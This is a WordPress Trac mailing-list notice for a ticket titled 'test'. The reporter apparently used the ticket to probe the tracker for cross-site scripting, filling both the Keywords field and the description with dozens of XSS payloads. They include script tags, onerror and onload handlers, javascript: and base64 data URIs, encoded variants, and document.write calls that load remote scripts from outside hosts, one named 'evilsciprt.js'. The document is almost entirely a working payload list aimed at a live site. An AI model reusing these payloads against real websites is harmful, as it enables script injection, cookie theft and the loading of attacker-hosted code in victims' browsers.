[wp-trac] [WordPress Trac] #47765: test
WordPress Trac
noreply at wordpress.org
Tue Jul 23 11:11:02 UTC 2019
#47765: test
-------------------------+-------------------------------------------------
Reporter: ph3n1x | Owner: (none)
Type: defect | Status: new
(bug) |
Priority: normal | Milestone: Awaiting Review
Component: HTTP API | Version:
Severity: trivial | Keywords: ><script>alert(1);</script>
| "><script>alert('document.cookie');</script>
| <script>alert("XSS at " +
| document.domain)</script>
| %3Cimg+src%3Dx+onerror%3Dprompt(document.domain)%3B%3E
| <html><body><script>alert(document.domain)</script></body></html>
| <svg/onload=prompt(document.domain)> '><img
| src=x onerror=alert('BoomXSS!')> "><img src=x
| onerror=prompt(document.domain)> <h1>XSS:)</h1>
| <href="url" onmouseover=alert(1)>
| alert(document.domain)});}}%3C/script%3E
| a"</li><iframe/onload=alert(document.domain)>
| */alert(document.domain);/* "><img src=x
| onerror=prompt(/XSS/);> "><img src=x
| onerror=prompt(navigator.userAgent);> "><img
| src=x onerror=prompt(1)> "><img src=x
| onerror=alert(document.domain)>
| javascript:alert(document.domain)
| <script>alert(String.fromCharCode(88 83
| 83))</script>
| <script>prompt(document.domain)</script>
| <script>document.write('<script
| src=http://trylangthis.site88.net/xss.js></scr'
| + 'ipt>')</script>
| <script>document.write('<script
| src=http://yourjavascript.com/18445241181/evilsciprt.js></scr'
| + 'ipt>')</script>
| http://yourjavascript.com/18445241181/evilsciprt.js
| <div><script>alert(document.domain)</script></div>
| <div><img src=x
| onerror=prompt(document.domain);></div>
| #?gad=xxxx"onload="alert(document.domain)" ----
| Try on GOOGLE ONLY depending on parameters
| </script><body onload=alert(document.domain)>
| t" onmouseover=alert(document.domain); a="
| 09179753489 <IFRAME
| SRC="javascript:alert(document.domain);"></IFRAME>
| <IFRAMESRC=data:text/html;base64
| Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbX
| B0KGRvY3VtZW50LmRvbWFpbik7Pg=="></IFRAME> <a
| href="data:text/html;base64
| Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY
| 3VtZW50LmRvbWFpbik7Pg==#">Continue</a> <a
| href=”javascript:alert(document.domain);”>Continue</a>
| <href="url" onmouseover=alert(document.domain)>
| t" onmouseover=alert(document.domain); a=" t"
| onmouseover=alert(document.domain); a=" t"
| onmouseover=alert(document.cookie); a=" <a
| href=”javascript:alert(document.domain);”>Continue</a>
| <a href='javascript:alert(document.domain)'
| onmouseover=alert(document.domain) >XSS :)</a>
| <a href=”data:text/html;base64
| PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
| #”>Continue</a> <a
| href="<script>alert(document.domain)</script>">XSS
| :)</a> <a href=”javascript:alert(0);”></a>
| continue=../javascript:alert(0); "/> <img
| src='aaa' onerror=alert(document.domain)> <img
| src="<img
| src=search"/onerror=alert(document.domain)//">
| <h1 onclick="alert(123)">123</h1> <h1
| onmouseover="alert(document.domain)">haha</h1>
| "><svg onload="prompt(document.domain);"> <IMG
| SRC=javascript:alert(String.fromCharCode(88 83
| 83))> alert(String.fromCharCode(88 83 83))
| %22?%?3E?%?3Cimg?%?20src?%?3Dx?%?20onerror?%?3Dprompt?%?281?%?
| 29?%?3B?%?3E "><img src=x
| onerror=prompt(document.domain);> <img
| src=x onerror=alert(1)><img class="emoji"
| alt="😯" src="x" /><svg
| onload=prompt(document.domain)><img
| class="emoji" alt="😯" src="x" /><svg
| onload=prompt(document.domain)>> "> <img
| class="emoji" alt=":hushed:" src="x" /><svg
| onload=prompt(document.domain)> <img
| class="emoji" alt=":hushed:" src="x" /><svg
| onload=prompt(document.domain)> "><img src=x
| onerror=alert(document.domain)> <href="url"
| onmouseover=alert(document.domain)> t"
| onmouseover=alert(document.domain); a=" <h1
| onclick="alert(123)">123</h1> <h1
Focuses: | onmouseover="alert(document.domain)">haha</h1>
-------------------------+-------------------------------------------------
"><script>alert(1);</script> "><script>alert('document.cookie');</script>
<script>alert("XSS at " + document.domain)</script>
%3Cimg+src%3Dx+onerror%3Dprompt(document.domain)%3B%3E
<html><body><script>alert(document.domain)</script></body></html>
<svg/onload=prompt(document.domain)> '><img src=x
onerror=alert('BoomXSS!')> "><img src=x onerror=prompt(document.domain)>
<h1>XSS:)</h1> <href="url" onmouseover=alert(1)>
alert(document.domain)});}}%3C/script%3E
a"</li><iframe/onload=alert(document.domain)> */alert(document.domain);/*
"><img src=x onerror=prompt(/XSS/);> "><img src=x
onerror=prompt(navigator.userAgent);> "><img src=x onerror=prompt(1)>
"><img src=x onerror=alert(document.domain)>
javascript:alert(document.domain) <script>alert(String.fromCharCode(88,
83, 83))</script> <script>prompt(document.domain)</script>
<script>document.write('<script
src=http://trylangthis.site88.net/xss.js></scr' + 'ipt>')</script>
<script>document.write('<script
src=http://yourjavascript.com/18445241181/evilsciprt.js></scr' +
'ipt>')</script> http://yourjavascript.com/18445241181/evilsciprt.js
<div><script>alert(document.domain)</script></div> <div><img src=x
onerror=prompt(document.domain);></div>
#?gad=xxxx"onload="alert(document.domain)" ---- Try on GOOGLE ONLY,
depending on parameters </script><body onload=alert(document.domain)> t"
onmouseover=alert(document.domain); a=" 09179753489 <IFRAME
SRC="javascript:alert(document.domain);"></IFRAME>
<IFRAMESRC=data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbX
B0KGRvY3VtZW50LmRvbWFpbik7Pg=="></IFRAME> <a
href="data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9cHJvbXB0KGRvY
3VtZW50LmRvbWFpbik7Pg==#">Continue</a> <a
href=”javascript:alert(document.domain);”>Continue</a> <href="url"
onmouseover=alert(document.domain)> t" onmouseover=alert(document.domain);
a=" t" onmouseover=alert(document.domain); a=" t"
onmouseover=alert(document.cookie); a=" <a
href=”javascript:alert(document.domain);”>Continue</a> <a
href='javascript:alert(document.domain)'
onmouseover=alert(document.domain) >XSS :)</a> <a
href=”data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K
#”>Continue</a> <a href="<script>alert(document.domain)</script>">XSS
:)</a> <a href=”javascript:alert(0);”></a>
continue=../javascript:alert(0); "/> <img src='aaa'
onerror=alert(document.domain)> <img src="<img
src=search"/onerror=alert(document.domain)//"> <h1
onclick="alert(123)">123</h1> <h1
onmouseover="alert(document.domain)">haha</h1> "><svg
onload="prompt(document.domain);"> <IMG
SRC=javascript:alert(String.fromCharCode(88,83,83))>
alert(String.fromCharCode(88, 83, 83))
%22?%?3E?%?3Cimg?%?20src?%?3Dx?%?20onerror?%?3Dprompt?%?281?%?
29?%?3B?%?3E "><img src=x onerror=prompt(document.domain);>
<img src=x onerror=alert(1)><img class="emoji" alt="😯" src="x"
/><svg onload=prompt(document.domain)><img class="emoji" alt="😯" src="x"
/><svg onload=prompt(document.domain)>>
">
<img class="emoji" alt=":hushed:" src="x" /><svg
onload=prompt(document.domain)>
<img class="emoji" alt=":hushed:" src="x" /><svg
onload=prompt(document.domain)>
"><img src=x onerror=alert(document.domain)>
<href="url" onmouseover=alert(document.domain)>
t" onmouseover=alert(document.domain); a="
<h1 onclick="alert(123)">123</h1> <h1
onmouseover="alert(document.domain)">haha</h1>
--
Ticket URL: <https://core.trac.wordpress.org/ticket/47765>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list